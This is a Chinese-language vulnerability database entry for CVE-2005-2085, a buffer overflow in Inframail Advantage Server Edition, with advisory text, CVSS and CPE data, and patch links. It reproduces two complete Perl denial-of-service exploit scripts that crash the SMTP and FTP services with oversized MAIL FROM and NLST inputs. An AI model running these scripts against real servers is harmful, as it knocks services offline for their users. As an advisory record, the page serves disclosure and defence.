CVE-2005-2085
CVSS5.0
发布时间 :2005-07-05 00:00:00
修订时间 :2016-10-17 23:24:54
NMCOE    

[原文]Buffer overflow in Inframail Advantage Server Edition 6.0 through 6.7 allows remote attackers to cause a denial of service (process crash) via a long (1) SMTP FROM field or possibly (2) FTP NLST command.


[CNNVD]infradig inframail 缓冲区溢出漏洞(CNNVD-200507-029)

        Inframail是一个集成了电子邮件、WWW、FTP、WebMail等多个功能的网络服务平台系统。
        Inframail Advantage Server Edition 6.0至6.7版本中存在缓冲区溢出漏洞。
        远程攻击者通过超长的SMTP FROM字段或FTP NLST命令使进程崩溃,导致拒绝服务。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:infradig_systems:inframail_advantage:server_6.7
cpe:/a:infradig_systems:inframail_advantage:server_6.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2085
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2085
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200507-029
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111998161006731&w=2
(UNKNOWN)  BUGTRAQ  20050628 Multiple buffer overflows exist in Infradig Systems Inframail Advantage Server Edition 6.0

- 漏洞信息

infradig inframail 缓冲区溢出漏洞
中危 缓冲区溢出
2005-07-05 00:00:00 2006-05-01 00:00:00
远程  
        Inframail是一个集成了电子邮件、WWW、FTP、WebMail等多个功能的网络服务平台系统。
        Inframail Advantage Server Edition 6.0至6.7版本中存在缓冲区溢出漏洞。
        远程攻击者通过超长的SMTP FROM字段或FTP NLST命令使进程崩溃,导致拒绝服务。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.infradig.com/download.shtml

- 漏洞信息 (1165)

Inframail Advantage Server Edition 6.0 <= 6.37 (SMTP) BoF Exploit (EDBID:1165)
windows dos
2005-06-27 Verified
0 Reed Arvin
N/A [点击下载]
#===== Start Inframail_SMTPOverflow.pl =====
#
# Usage: Inframail_SMTPOverflow.pl <ip>
#        Inframail_SMTPOverflow.pl 127.0.0.1
#
# Infradig Systems Inframail Advantage Server Edition 6.0
# (Version: 6.37)
#
# Download:
# http://www.infradig.com/
#
#########################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "25",
                                    Proto    => "TCP"))
{
        print "Attempting to kill Inframail SMTP server at $ARGV[0]:25...";

        sleep(1);

        print $socket "HELO moto.com\r\n";

        sleep(1);

        print $socket "MAIL FROM:" . "A" x 40960 . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:25\n";
}
#===== End Inframail_SMTPOverflow.pl =====

# milw0rm.com [2005-06-27]
		

- 漏洞信息 (1166)

Inframail Advantage Server Edition 6.0 <= 6.37 (FTP) BoF Exploit (EDBID:1166)
windows dos
2005-06-27 Verified
0 Reed Arvin
N/A [点击下载]
#===== Start Inframail_FTPOverflow.pl =====
#
# Usage: Inframail_FTPOverflow.pl <ip>
#        Inframail_FTPOverflow.pl 127.0.0.1
#
# Infradig Systems Inframail Advantage Server Edition 6.0
# (Version: 6.37)
#
# Download:
# http://www.infradig.com/
#
#########################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "21",
                                    Proto    => "TCP"))
{
        print "Attempting to kill Inframail FTP server at $ARGV[0]:21...";

        sleep(1);

        print $socket "USER hello\r\n";

        sleep(1);

        print $socket "PASS moto\r\n";

        sleep(1);

        print $socket "NLST " . "A" x 102400 . "\r\n";

        sleep(1);

        print $socket "NLST " . "A" x 102400 . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:21\n";
}
#===== End Inframail_FTPOverflow.pl =====

# milw0rm.com [2005-06-27]
		

- 漏洞信息

17607
Inframail SMTP MAIL FROM Command Remote Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-06-27 Unknow
2005-06-27 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站